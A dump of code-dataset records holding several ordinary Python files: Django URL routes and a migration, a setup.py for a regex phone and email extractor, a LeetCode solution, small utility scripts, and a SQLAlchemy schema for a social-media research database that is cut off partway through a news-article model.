.views import RegistrationAPIView, LoginAPIView, UserRetrieveUpdateAPIView\n\napp_name='auth'\n\nurlpatterns = [\n path('user/', UserRetrieveUpdateAPIView.as_view(), name='retrieveUpdate'),\n path('users/', RegistrationAPIView.as_view(), name='registration'),\n path('users/login/', LoginAPIView.as_view(), name='login'),\n]","sub_path":"ratebum/apps/authentication/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"395177458","text":"#! python3\nimport os\nfrom setuptools import setup, find_packages\n\n# read the contents of your README file\nthis_directory = os.path.abspath(os.path.dirname(__file__))\nwith open(os.path.join(this_directory, 'README.md')) as f:\n long_description = f.read()\n\nsetup (\n\tname = \"extractor_phone_email\",\n\tversion = \"1.0.3\", \n\tdescription = \"Package that allows, with regular expressions, to extract from texts, phone numbers and emails\",\n\tlong_description = long_description,\n\tlong_description_content_type = \"text/markdown\",\n\tauthor = \"Dari Developer\",\n\tauthor_email = \"hernandezdarifrancisco@gmail.com\",\n\tlicense = \"MIT\",\n\tkeywords = \"extract, re, phones, emails\",\n\tproject_urls = {\n\t\t\"Documentation\": \"https://github.com/DariHernandez/phone_and_email_extractor/blob/master/README.md\",\n\t\t\"Funding\": \"https://www.paypal.com/paypalme/FranciscoDari\",\n\t\t\"Source\": \"https://github.com/DariHernandez/phone_and_email_extractor\"\n\t\t},\n\tpackages = find_packages(include=[\"extractor_phone_email\", \"extractor_phone_email.*\"]),\n\tinstall_requires = [\"pyperclip\"],\n\tpython_requires = \">=3.7\"\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"190829224","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport mptt.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contents', '0001_initial'),\n ('templates', '0001_initial'),\n ('news', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Menu',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('slug', models.SlugField(unique=True)),\n ('menu_depth', models.PositiveSmallIntegerField(default=0)),\n ],\n options={\n 'ordering': ['slug'],\n 'db_table': 'menus',\n },\n ),\n migrations.CreateModel(\n name='Page',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=255)),\n ('slug', models.SlugField(unique=True)),\n ('is_active', models.BooleanField(default=True)),\n ('show_breadcrumbs', models.BooleanField(default=True)),\n ('position', models.PositiveSmallIntegerField(default=0, blank=True)),\n ('redirect_link', models.CharField(max_length=255, null=True, blank=True)),\n ('lft', models.PositiveIntegerField(editable=False, db_index=True)),\n ('rght', models.PositiveIntegerField(editable=False, db_index=True)),\n ('tree_id', models.PositiveIntegerField(editable=False, db_index=True)),\n ('level', models.PositiveIntegerField(editable=False, db_index=True)),\n ('category_link', models.ForeignKey(related_name='page_category', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='news.Category', null=True)),\n ('content_link', models.ForeignKey(related_name='page_content', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='contents.Content', null=True)),\n ('parent', mptt.fields.TreeForeignKey(related_name='children', blank=True, to='pages.Page', null=True)),\n ('template', models.ForeignKey(blank=True, to='templates.Template', null=True)),\n ],\n options={\n 'ordering': ['position', 'title'],\n 'db_table': 'pages',\n },\n ),\n migrations.AddField(\n model_name='menu',\n name='pages',\n field=models.ManyToManyField(related_name='pages_menu', to='pages.Page', blank=True),\n ),\n ]\n","sub_path":"apps/pages/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"60664677","text":"\n\nfrom xai.brain.wordbase.verbs._contain import _CONTAIN\n\n#calss header\nclass _CONTAINED(_CONTAIN, ):\n\tdef __init__(self,): \n\t\t_CONTAIN.__init__(self)\n\t\tself.name = \"CONTAINED\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"contain\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_contained.py","file_name":"_contained.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"526018672","text":"class Solution:\r\n def productExceptSelf(self, nums: List[int]) -> List[int]:\r\n leftarr= [0]*len(nums)\r\n lproduct = 1\r\n rproduct = 1\r\n for i in range(len(nums)):\r\n if i>=1:\r\n lproduct *= nums[i-1]\r\n leftarr[i]=lproduct\r\n for i in range(len(nums)-1, -1,-1):\r\n if i<=len(nums)-2:\r\n rproduct *= nums[i+1]\r\n leftarr[i]*=rproduct\r\n return leftarr\r\n \r\n\"\"\"Time complexity : O(n)\r\nSpace complexity :O(1) as the array utilized for the calculations is returned as output\r\nand its not considered as auxilary space\"\"\"\r\n\r\n # arr = []\r\n # for i in range(len(nums)):\r\n # product = 1\r\n # for j in range(len(nums)):\r\n # if i!=j:\r\n # product *=nums[j]\r\n # arr.append(product)\r\n # return arr\r\n \r\n # leftarr= [0]*len(nums)\r\n # rightarr=[0]*len(nums)\r\n # lproduct = 1\r\n # rproduct = 1\r\n # for i in range(len(nums)):\r\n # if i>=1:\r\n # lproduct *= nums[i-1]\r\n # leftarr[i]=lproduct\r\n # for i in range(len(nums)-1, -1,-1):\r\n # if i<=len(nums)-2:\r\n # rproduct *= nums[i+1]\r\n # rightarr[i]=rproduct\r\n # for i in range(len(nums)):\r\n # rightarr[i]*=leftarr[i]\r\n # return rightarr\r\n \r\n \r\n \r\n \r\n \r\n ","sub_path":"ProductexceptSelf.py","file_name":"ProductexceptSelf.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17055404","text":"#!/usr/bin/env python\r\n#\r\n# File Name: filter_papers.py\r\n# Author: Evan Pete Walsh\r\n# Contact: epwalsh@iastate.edu\r\n# Creation Date: 02-02-2016\r\n# Last Modified: Mon Feb 15 17:30:04 2016\r\n# =============================================================================\r\n\r\n\"\"\" Remove papers that describe multiple studies and create master key with\r\nclassification of experimental design for all papers in 'clean' folder. \"\"\"\r\n\r\nimport pandas as pd\r\nimport os\r\nimport re\r\n\r\n\r\ndef change_suffix(s):\r\n res = re.sub(r\"\\.pdf\", \".txt\", s)\r\n return res\r\n\r\n# Remove papers with multiple studies\r\ndf = pd.read_csv(\"~/AFLEX/master_key/papers_with_multiple_studies.csv\")\r\ndf['File'] = df['File Name'].map(lambda x: change_suffix(x))\r\n\r\npath = \"/Users/epwalsh/AFLEX/papers/clean/\"\r\n\r\nfor f in df['File']:\r\n if os.path.isfile(path + f):\r\n os.remove(path + f)\r\n\r\n\r\n# Create classification list\r\nkey = pd.read_csv(\"~/AFLEX/master_key/master_key02.csv\")\r\nkey['File'] = key['File Name'].map(lambda x: change_suffix(x))\r\nkey = key.drop(['File Name'], axis=1)\r\n\r\nhome = os.path.expanduser('~')\r\npapers_dir = home + '/AFLEX/papers/clean/'\r\nfiles = [f for f in os.listdir(papers_dir) if\r\n os.path.isfile(os.path.join(papers_dir, f))]\r\n\r\nkey2 = pd.DataFrame(columns=['File'])\r\nkey2['File'] = files\r\n\r\nkey3 = pd.merge(key2, key, on='File', how='left')\r\nkey3.fillna(value='other', inplace=True)\r\nkey3.to_csv(\"response.csv\", index=False)\r\n","sub_path":"baseline/02_filter_papers.py","file_name":"02_filter_papers.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78329791","text":"'''\nauthor: HAK\ntime : 10:00 PM, 28/10/2017\n'''\n\nimport argparse\nimport re\nfrom directoryInfo import PATH_INFO_PROVIDER\nfrom Watch import Watcher\n\n\nparser = argparse.ArgumentParser(prog='WATCHER',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description='Watch directory with a path specified.')\nparser.add_argument('--path' , '-p', type=str, default='.', help=\"Specify full path to a directory.\")\nparser.add_argument('-s', action='store_true')\nargs = parser.parse_args()\nDIRECTORY_NAME = re.sub('[\\'\\\"]','',args.path)\nDIR_INFO = PATH_INFO_PROVIDER(DIRECTORY_NAME)\n\n\nif DIR_INFO.ISDIR() == True:\n if(args.s):\n print(\"Binding Server...\")\n Watcher(DIR_INFO.DIRNAME(), True).run()\n else:\n Watcher(DIR_INFO.DIRNAME(), False).run()\nelse:\n print('Defined directory', DIRECTORY_NAME, \"does not exist.\")","sub_path":"observe.py","file_name":"observe.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"24271459","text":"# Created by aviade\n# Time: 31/03/2016 09:15\n\nimport logging\nimport os\nimport platform\n\nimport sqlalchemy\nfrom configuration.config_class import getConfig\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm import aliased\nfrom sqlalchemy import event\nfrom sqlalchemy.sql.operators import ColumnOperators\nfrom sqlalchemy import Column, func, and_, or_, not_\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Boolean, Integer, Unicode, FLOAT\nfrom sqlalchemy.sql.schema import ForeignKey\nfrom sqlalchemy.sql.expression import *\nfrom sqlalchemy.sql import text\nfrom datetime import datetime, timedelta\nfrom commons.commons import *\nfrom commons.consts import DB_Insertion_Type, Author_Type, Author_Connection_Type\nimport re\nimport itertools\nfrom commons.consts import Domains, Social_Networks\nimport pandas as pd\nimport csv\nfrom collections import defaultdict\nfrom sqlalchemy.inspection import inspect\nfrom sqlalchemy.orm import mapper\nfrom itertools import chain\n\nBase = declarative_base()\n\nconfigInst = getConfig()\n\ndialect_name = getConfig().get(\"DB\", \"dialect_name\")\n\nexec('import ' + dialect_name)\n\nexec('from ' + dialect_name + ' import DATETIME')\n\ndt = eval(dialect_name).DATETIME(\n storage_format=\"%(year)04d-%(month)02d-%(day)02d %(hour)02d:%(minute)02d:%(second)02d\",\n regexp=r\"(\\d{4})-(\\d{2})-(\\d{2}) (\\d{2}):(\\d{2}):(\\d{2})\",\n)\n\ndomain = getConfig().get(\"DEFAULT\", \"domain\")\n\n\nclass Author(Base):\n __tablename__ = 'authors'\n\n name = Column(Unicode, primary_key=True)\n domain = Column(Unicode, primary_key=True)\n author_guid = Column(Unicode, primary_key=True)\n\n author_screen_name = Column(Unicode, default=None)\n author_full_name = Column(Unicode, default=None)\n author_osn_id = Column(Unicode, default=None)\n description = Column(Unicode, default=None)\n created_at = Column(Unicode, default=None)\n statuses_count = Column(Integer, default=None)\n followers_count = Column(Integer, default=None)\n favourites_count = Column(Integer, default=None)\n friends_count = Column(Integer, default=None)\n listed_count = Column(Integer, default=None)\n language = Column(Unicode, default=None)\n profile_background_color = Column(Unicode, default=None)\n profile_background_tile = Column(Unicode, default=None)\n profile_banner_url = Column(Unicode, default=None)\n profile_image_url = Column(Unicode, default=None)\n profile_link_color = Column(Unicode, default=None)\n profile_sidebar_fill_color = Column(Unicode, default=None)\n profile_text_color = Column(Unicode, default=None)\n default_profile = Column(Unicode, default=None)\n contributors_enabled = Column(Unicode, default=None)\n default_profile_image = Column(Unicode, default=None)\n geo_enabled = Column(Unicode, default=None)\n protected = Column(Boolean, default=None)\n location = Column(Unicode, default=None)\n notifications = Column(Unicode, default=None)\n time_zone = Column(Unicode, default=None)\n url = Column(Unicode, default=None)\n utc_offset = Column(Unicode, default=None)\n verified = Column(Unicode, default=None)\n is_suspended_or_not_exists = Column(dt, default=None)\n\n # Tumblr fields\n default_post_format = Column(Unicode, default=None)\n likes_count = Column(Integer, default=None)\n allow_questions = Column(Boolean, default=False)\n allow_anonymous_questions = Column(Boolean, default=False)\n image_size = Column(Integer, default=None)\n\n media_path = Column(Unicode, default=None)\n\n author_type = Column(Unicode, default=None)\n bad_actors_collector_insertion_date = Column(Unicode, default=None)\n xml_importer_insertion_date = Column(Unicode, default=None)\n vico_dump_insertion_date = Column(Unicode, default=None)\n missing_data_complementor_insertion_date = Column(Unicode, default=None)\n bad_actors_markup_insertion_date = Column(Unicode, default=None)\n mark_missing_bad_actor_retweeters_insertion_date = Column(Unicode, default=None)\n author_sub_type = Column(Unicode, default=None)\n timeline_overlap_insertion_date = Column(Unicode, default=None)\n original_tweet_importer_insertion_date = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.name, self.domain, self.author_guid, self.statuses_count)\n\n\nclass PostAuthorsConnections(Base):\n __tablename__ = 'post_authors_connections'\n post_id = Column(Unicode, primary_key=True)\n user_id = Column(Unicode, primary_key=True)\n\nclass AuthorConnection(Base):\n __tablename__ = 'author_connections'\n\n source_author_guid = Column(Unicode, primary_key=True)\n destination_author_guid = Column(Unicode, primary_key=True)\n connection_type = Column(Unicode, primary_key=True)\n weight = Column(FLOAT, default=0.0)\n insertion_date = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (self.source_author_guid, self.destination_author_guid,\n self.connection_type, self.weight, self.insertion_date)\n\n\nclass TempAuthorConnection(Base):\n __tablename__ = 'temp_author_connections'\n\n source_author_osn_id = Column(Unicode, primary_key=True)\n destination_author_osn_id = Column(Unicode, primary_key=True)\n connection_type = Column(Unicode, primary_key=True)\n weight = Column(FLOAT, default=0.0)\n insertion_date = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (self.source_author_osn_id, self.destination_author_osn_id,\n self.connection_type, self.weight, self.insertion_date)\n\n\nclass PostRetweeterConnection(Base):\n __tablename__ = 'post_retweeter_connections'\n\n post_osn_id = Column(Integer, primary_key=True)\n retweeter_twitter_id = Column(Integer, primary_key=True)\n connection_type = Column(Unicode, primary_key=True)\n insertion_date = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.post_osn_id, self.retweeter_twitter_id, self.connection_type)\n\n\nclass PostUserMention(Base):\n __tablename__ = 'post_user_mentions'\n\n post_guid = Column(Integer, primary_key=True)\n user_mention_twitter_id = Column(Integer, primary_key=True)\n user_mention_screen_name = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.post_guid, self.user_mention_twitter_id, self.user_mention_screen_name)\n\n\nclass Post(Base):\n __tablename__ = 'posts'\n\n post_id = Column(Unicode, primary_key=True, index=True)\n author = Column(Unicode, default=None)\n guid = Column(Unicode, default=None)\n title = Column(Unicode, default=None)\n url = Column(Unicode, default=None)\n date = Column(dt, default=None)\n content = Column(Unicode, default=None)\n description = Column(Unicode, default=None)\n is_detailed = Column(Boolean, default=True)\n is_LB = Column(Boolean, default=False)\n is_valid = Column(Boolean, default=True)\n domain = Column(Unicode, primary_key=True, default=None)\n author_guid = Column(Unicode, default=None)\n\n media_path = Column(Unicode, default=None)\n\n # keywords = Column(Unicode, default=None)\n # paragraphs = Column(Unicode, default=None)\n post_osn_guid = Column(Unicode, default=None)\n post_type = Column(Unicode, default=None)\n post_format = Column(Unicode, default=None)\n reblog_key = Column(Unicode, default=None)\n tags = Column(Unicode, default=None)\n is_created_via_bookmarklet = Column(Boolean, default=None)\n is_created_via_mobile = Column(Boolean, default=None)\n source_url = Column(Unicode, default=None)\n source_title = Column(Unicode, default=None)\n is_liked = Column(Boolean, default=None)\n post_state = Column(Unicode, default=None)\n\n post_osn_id = Column(Integer, default=None)\n retweet_count = Column(Integer, default=None)\n favorite_count = Column(Integer, default=None)\n # reply_count = Column(Integer, default=None)\n # language = Column(Unicode, default=None)\n created_at = Column(Unicode, default=None)\n xml_importer_insertion_date = Column(Unicode, default=None)\n timeline_importer_insertion_date = Column(Unicode, default=None)\n original_tweet_importer_insertion_date = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.post_id, self.guid, self.title, self.url, self.date, self.content, self.author, self.is_detailed,\n self.is_LB, self.domain, self.author_guid)\n\n\nclass Post_citation(Base):\n __tablename__ = 'post_citations'\n\n post_id_from = Column(Unicode, ForeignKey('posts.post_id', ondelete=\"CASCADE\"), primary_key=True)\n post_id_to = Column(Unicode, ForeignKey('posts.post_id', ondelete=\"CASCADE\"), primary_key=True)\n url_from = Column(Unicode, index=True) # need to be deleted do not use it\n url_to = Column(Unicode, index=True) # need to be deleted do not use it\n\n def __repr__(self):\n return \"\" % (\n self.post_id_from, self.post_id_to, self.url_from, self.url_to)\n\n\nclass Target_Article(Base):\n __tablename__ = 'target_articles'\n\n post_id = Column(Unicode, ForeignKey('posts.post_id', ondelete=\"CASCADE\"), primary_key=True)\n author_guid = Column(Unicode, ForeignKey('posts.author_guid', ondelete=\"CASCADE\"), primary_key=True)\n title = Column(Unicode, default=None)\n description = Column(Unicode, default=None)\n keywords = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.post_id, self.author_guid, self.title, self.description, self.keywords)\n\n\n# could be a 'paragraph' or caption\nclass Target_Article_Item(Base):\n __tablename__ = 'target_article_items'\n\n post_id = Column(Unicode, ForeignKey('posts.post_id', ondelete=\"CASCADE\"), primary_key=True)\n author_guid = Column(Unicode, ForeignKey('posts.author_guid', ondelete=\"CASCADE\"), primary_key=True)\n type = Column(Unicode, default=None, primary_key=True)\n item_number = Column(Integer, default=None, primary_key=True)\n content = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.post_id, self._author_guid, self.type, self.item_number, self.content)\n\n\nclass Text_From_Image(Base):\n __tablename__ = 'image_hidden_texts'\n\n post_id = Column(Unicode, ForeignKey('posts.post_id', ondelete=\"CASCADE\"), primary_key=True)\n author_guid = Column(Unicode, ForeignKey('posts.author_guid', ondelete=\"CASCADE\"), primary_key=True)\n media_path = Column(Unicode, default=None)\n content = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.post_id, self.author_guid, self.media_path, self.content)\n\n\nclass Image_Tags(Base):\n __tablename__ = 'image_tags'\n\n post_id = Column(Unicode, ForeignKey('posts.post_id', ondelete=\"CASCADE\"), primary_key=True)\n author_guid = Column(Unicode, ForeignKey('posts.author_guid', ondelete=\"CASCADE\"), primary_key=True)\n media_path = Column(Unicode, default=None)\n tags = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.post_id, self.author_guid, self.media_path, self.tags)\n\n\nclass AuthorCitation(Base):\n __tablename__ = 'author_citations'\n # author_id_from = Column(Integer,ForeignKey(\"authors.author_id\",ondelete=\"CASCADE\"),primary_key=True)\n # author_id_from = Column(Integer,primary_key=True)\n from_author = Column(Unicode, primary_key=True)\n from_domain = Column(Unicode, primary_key=True)\n # author_id_to = Column(Integer,ForeignKey(\"authors.author_id\",ondelete=\"CASCADE\"),primary_key=True)\n # author_id_to = Column(Integer,primary_key=True)\n to_author = Column(Unicode, primary_key=True)\n to_domain = Column(Unicode, primary_key=True)\n window_start = Column(dt, primary_key=True)\n window_end = Column(dt, primary_key=True, default=None)\n number_of_citations = Column(Integer, default=None)\n from_author_guid = Column(Integer, ForeignKey(\"authors.author_guid\", ondelete=\"CASCADE\"))\n to_author_guid = Column(Integer, ForeignKey(\"authors.author_guid\", ondelete=\"CASCADE\"))\n\n def __repr__(self):\n return \"\" % (\n self.window_start, self.from_author, self.from_domain, self.to_author, self.to_domain,\n self.number_of_citations,\n self.from_author_guid, self.to_author_guid)\n\n\nclass AuthorFeatures(Base):\n __tablename__ = 'author_features'\n author_guid = Column(Unicode, primary_key=True)\n window_start = Column(dt, primary_key=True)\n window_end = Column(dt, primary_key=True)\n attribute_name = Column(Unicode, primary_key=True)\n attribute_value = Column(Unicode)\n\n def __repr__(self):\n return \" \" % (\n self.author_guid, self.window_start, self.window_end, self.attribute_name, self.attribute_value)\n\n def __init__(self, _author_guid=None, _window_start=None, _window_end=None, _attribute_name=None,\n _attribute_value=None):\n self.author_guid = _author_guid\n self.window_start = _window_start\n self.window_end = _window_end\n self.attribute_name = _attribute_name\n self.attribute_value = _attribute_value\n\n\nclass Author_boost_stats(Base):\n __tablename__ = 'authors_boost_stats'\n\n window_start = Column(dt, default=None, primary_key=True)\n window_end = Column(dt, default=None)\n # author_id = Column(Integer,ForeignKey(\"authors.author_id\"),primary_key=True)\n # author_id = Column(Integer,default=None) #@todo: remove field. use name and domain. reinsert author_id appropriately.\n author_name = Column(Integer, default=None, primary_key=True)\n author_domain = Column(Integer, default=None, primary_key=True) # @todo: add domain values\n boosting_timeslots_participation_count = Column(Integer, default=None)\n count_of_authors_sharing_boosted_posts = Column(Integer, default=None)\n num_of_pointers = Column(Integer, default=None)\n num_of_pointed_posts = Column(Integer, default=None)\n pointers_scores = Column(Unicode, default=None)\n scores_sum = Column(FLOAT, default=None)\n scores_avg = Column(FLOAT, default=None)\n scores_std = Column(FLOAT, default=None)\n author_guid = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.window_start, self.window_end, self.boosting_timeslots_participation_count,\n self.count_of_authors_sharing_boosted_posts, self.num_of_pointers, self.num_of_pointed_posts,\n self.pointers_scores, self.scores_sum, self.scores_avg, self.scores_std, self.author_guid)\n\n\nclass Post_to_pointers_scores(Base):\n __tablename__ = 'posts_to_pointers_scores'\n post_id_to = Column(Integer, ForeignKey(\"post_citations.post_id_to\"), primary_key=True)\n window_start = Column(dt, primary_key=True)\n window_end = Column(dt, default=None)\n url_to = Column(Unicode, default=None)\n # author_id_from = Column(Integer,ForeignKey(\"authors.author_id\"),primary_key=True)\n # author_id_from = Column(Integer,default=None)#@todo: remove field. use name and domain. reinsert author_id appropriately.\n author_name = Column(Integer, default=None, primary_key=True)\n author_domain = Column(Integer, default=None, primary_key=True) # @todo: add domain values\n datetime = Column(Unicode, primary_key=True)\n pointer_score = Column(FLOAT, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.post_id_to, self.window_start, self.window_end, self.url_to, self.author_id_from, self.dt,\n self.pointer_score)\n\n\nclass Posts_representativeness(Base):\n __tablename__ = 'posts_representativeness'\n\n post_id = Column(Unicode, ForeignKey(\"posts.post_id\"), primary_key=True)\n topic_id = Column(Integer, primary_key=True)\n url = Column(Unicode, default=None)\n how_many_times_cited_in_topic = Column(Integer, default=None)\n in_how_many_topics = Column(Integer, default=None)\n post_count = Column(Integer, default=None)\n tfidf = Column(FLOAT, default=None)\n tof = Column(Integer, default=None)\n\n def __repr__(self):\n return \"\" % \\\n (self.post_id, self.topic_id, self.url, self.how_many_times_cited_in_topic, self.in_how_many_topics,\n self.post_count, self.tfidf, self.tof)\n\n\nclass AnchorAuthor(Base):\n __tablename__ = 'anchor_authors'\n\n author_guid = Column(Unicode, ForeignKey(\"authors.author_guid\"), primary_key=True)\n author_type = Column(Unicode, default=None)\n\n def __init__(self, _author_guid, _author_type):\n self.author_guid = _author_guid\n self.author_type = _author_type\n\n def __repr__(self):\n return \"\" % \\\n (self.author_guid, self.author_type)\n\n\nclass RandomAuthorForGraph(Base):\n __tablename__ = 'random_authors_for_graphs'\n\n author_guid = Column(Unicode, ForeignKey(\"authors.author_guid\"), primary_key=True)\n author_type = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % \\\n (self.author_guid, self.author_type)\n\n\nclass SinglePostByAuthor(Base):\n __tablename__ = 'single_post_by_author'\n\n post_id = Column(Unicode, primary_key=True)\n author_guid = Column(Unicode, primary_key=True)\n date = Column(dt)\n content = Column(Unicode)\n domain = Column(Unicode)\n\n def __repr__(self):\n return \"\" % \\\n (self.post_id, self.author_guid, self.date, self.content, self.domain)\n\n\nclass Struct:\n def __init__(self, **entries): self.__dict__.update(entries)\n\n\nclass Post_to_topic(Base):\n __tablename__ = \"posts_to_topic\"\n\n topic_id = Column(Integer, ForeignKey(\"topics.topic_id\"), primary_key=True)\n window_start = Column(dt, default=None, primary_key=True)\n window_end = Column(dt, default=None)\n post_id = Column(Integer, ForeignKey(\"posts.post_id\"), primary_key=True)\n guid = Column(Unicode, default=None)\n url = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.topic_id, self.window_start, self.window_end, self.post_id, self.guid, self.url)\n\n\nclass PostTopicMapping(Base):\n __tablename__ = \"post_topic_mapping\"\n\n post_id = Column(Unicode, ForeignKey(\"posts.post_id\"), primary_key=True)\n max_topic_dist = Column(FLOAT, default=None)\n max_topic_id = Column(Integer, default=None)\n\n\nclass Term(Base):\n __tablename__ = \"terms\"\n\n term_id = Column(Integer, primary_key=True)\n description = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.term_id, self.description)\n\n\nclass Topic(Base):\n __tablename__ = \"topics\"\n\n topic_id = Column(Integer, primary_key=True)\n description = Column(Unicode, default=None)\n term_id = Column(Integer, ForeignKey(\"terms.term_id\"), primary_key=True)\n probability = Column(FLOAT, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.topic_id, self.description, self.term_id, self.probability)\n\n\nclass Politifact_Liar_Dataset(Base):\n __tablename__ = \"politifact_liar_dataset\"\n\n post_guid = Column(Unicode, ForeignKey(\"posts.guid\"), primary_key=True)\n original_id = Column(Integer, default=None)\n statement = Column(Unicode, default=None)\n targeted_label = Column(Unicode, default=None)\n dataset_affiliation = Column(Unicode, default=None)\n subject = Column(Unicode, default=None)\n speaker = Column(Unicode, default=None)\n speaker_job_title = Column(Unicode, default=None)\n state_info = Column(Unicode, default=None)\n party_affiliation = Column(Unicode, default=None)\n barely_true_count = Column(Integer, default=None)\n false_count = Column(Integer, default=None)\n half_true_count = Column(Integer, default=None)\n mostly_true_count = Column(Integer, default=None)\n pants_on_fire_count = Column(Integer, default=None)\n context = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.post_guid, self.original_id, self.statement, self.targeted_label)\n\n\nclass Claim_Tweet_Connection(Base):\n __tablename__ = \"claim_tweet_connection\"\n\n claim_id = Column(Unicode, primary_key=True) # PolitiFact post\n post_id = Column(Unicode, primary_key=True) # crawled tweet by\n\n\nclass Claim(Base):\n __tablename__ = \"claims\"\n\n claim_id = Column(Unicode, primary_key=True, index=True)\n title = Column(Unicode, default=None)\n description = Column(Unicode, default=None)\n url = Column(Unicode, default=None)\n verdict_date = Column(dt, default=None)\n keywords = Column(Unicode, default=None)\n domain = Column(Unicode, default=None)\n verdict = Column(Unicode, default=None)\n category = Column(Unicode, default=None)\n sub_category = Column(Unicode, default=None)\n\n def __repr__(self):\n return \"\" % (\n self.claim_id, self.title, self.description, self.url, self.verdict_date, self.keywords, self.domain,\n self.verdict)\n\n\nclass Claim_Keywords_Connections(Base):\n __tablename__ = \"claim_keywords_connections\"\n claim_id = Column(Unicode, primary_key=True, index=True)\n type = Column(Unicode, primary_key=True, index=True)\n keywords = Column(Unicode, default=None)\n score = Column(FLOAT, default=None)\n tweet_count = Column(Integer, default=None)\n\n\nclass RedditPostCommentConnection(Base):\n __tablename__ = \"reddit_post_comment_connection\"\n post_id = Column(Unicode, primary_key=True, index=True)\n comment_id = Column(Unicode, primary_key=True, index=True)\n\n\nclass RedditPost(Base):\n __tablename__ = 'reddit_posts'\n post_id = Column(Unicode, primary_key=True, index=True)\n guid = Column(Unicode, default=None)\n link_in_body = Column(Unicode, default=None)\n ups = Column(Integer, default=0)\n downs = Column(Integer, default=0)\n score = Column(Integer, default=0)\n upvote_ratio = Column(Integer, default=0)\n number_of_comments = Column(Integer, default=None)\n parent_id = Column(Unicode, default=None)\n stickied = Column(Boolean, default=False)\n is_submitter = Column(Boolean, default=False)\n distinguished = Column(Unicode, default=None)\n\n\nclass RedditAuthor(Base):\n __tablename__ = 'reddit_authors'\n\n name = Column(Unicode, primary_key=True)\n author_guid = Column(Unicode, primary_key=True)\n comments_count = Column(Integer, default=0)\n comment_karma = Column(Integer, default=0)\n link_karma = Column(Integer, default=0)\n is_gold = Column(Boolean, default=False)\n is_moderator = Column(Boolean, default=False)\n is_employee = Column(Boolean, default=False)\n\n\nclass InstagramPost(Base):\n __tablename__ = 'instagram_posts'\n id = Column(Unicode, primary_key=True)\n display_url = Column(Unicode, default=None)\n comments_disabled = Column(Boolean, default=None)\n likes = Column(Integer, default=None)\n # body = Column(Unicode, default=None)\n comment_count = Column(Integer, default=None)\n is_video = Column(Boolean, default=None)\n # owner_id = Column(Unicode, default=None)\n shortcode = Column(Unicode, default=None)\n # taken_at_timestamp = Column(Integer, default=None)\n thumbnail_resources = Column(Unicode, default=None)\n media_preview = Column(Unicode, default=None)\n gating_info = Column(Unicode, default=None)\n dimensions = Column(Unicode, default=None)\n instagram_typename = Column(Unicode, default=None)\n hashtag = Column(Unicode, default=None)\n\n\nclass InstagramAuthor(Base):\n __tablename__ = 'instagram_authors'\n id = Column(Unicode, primary_key=True)\n # username = Column(Unicode, default=None)\n # full_name = Column(Unicode, default=None)\n # biography = Column(Unicode, default=None)\n followers_count = Column(Integer, default=None)\n following_count = Column(Integer, default=None)\n posts_count = Column(Integer, default=None)\n is_business_account = Column(Boolean, default=None)\n is_joined_recently = Column(Boolean, default=None)\n is_private = Column(Boolean, default=None)\n # profile_pic_url = Column(Unicode, default=None)\n\n\nclass GooglePostKeywords(Base):\n __tablename__ = 'google_post_keywords'\n\n post_id = Column(Integer, primary_key=True)\n keywords = Column(Unicode, primary_key=True)\n insertion_date = Column(Unicode, default=None)\n\n\nclass NewsArticle(Base):\n __tablename__ = 'news_articles'\n\n article_id = Column(Unicode, ForeignKey('claims.claim_id', ondelete=\"CASCADE\"), primary_key=True)\n author = Column(Unicode, default=None)\n published_date = Column(dt, default=None)\n domain = Column(Unicode, default=None)\n url = Column(Unicode, default=None)\n 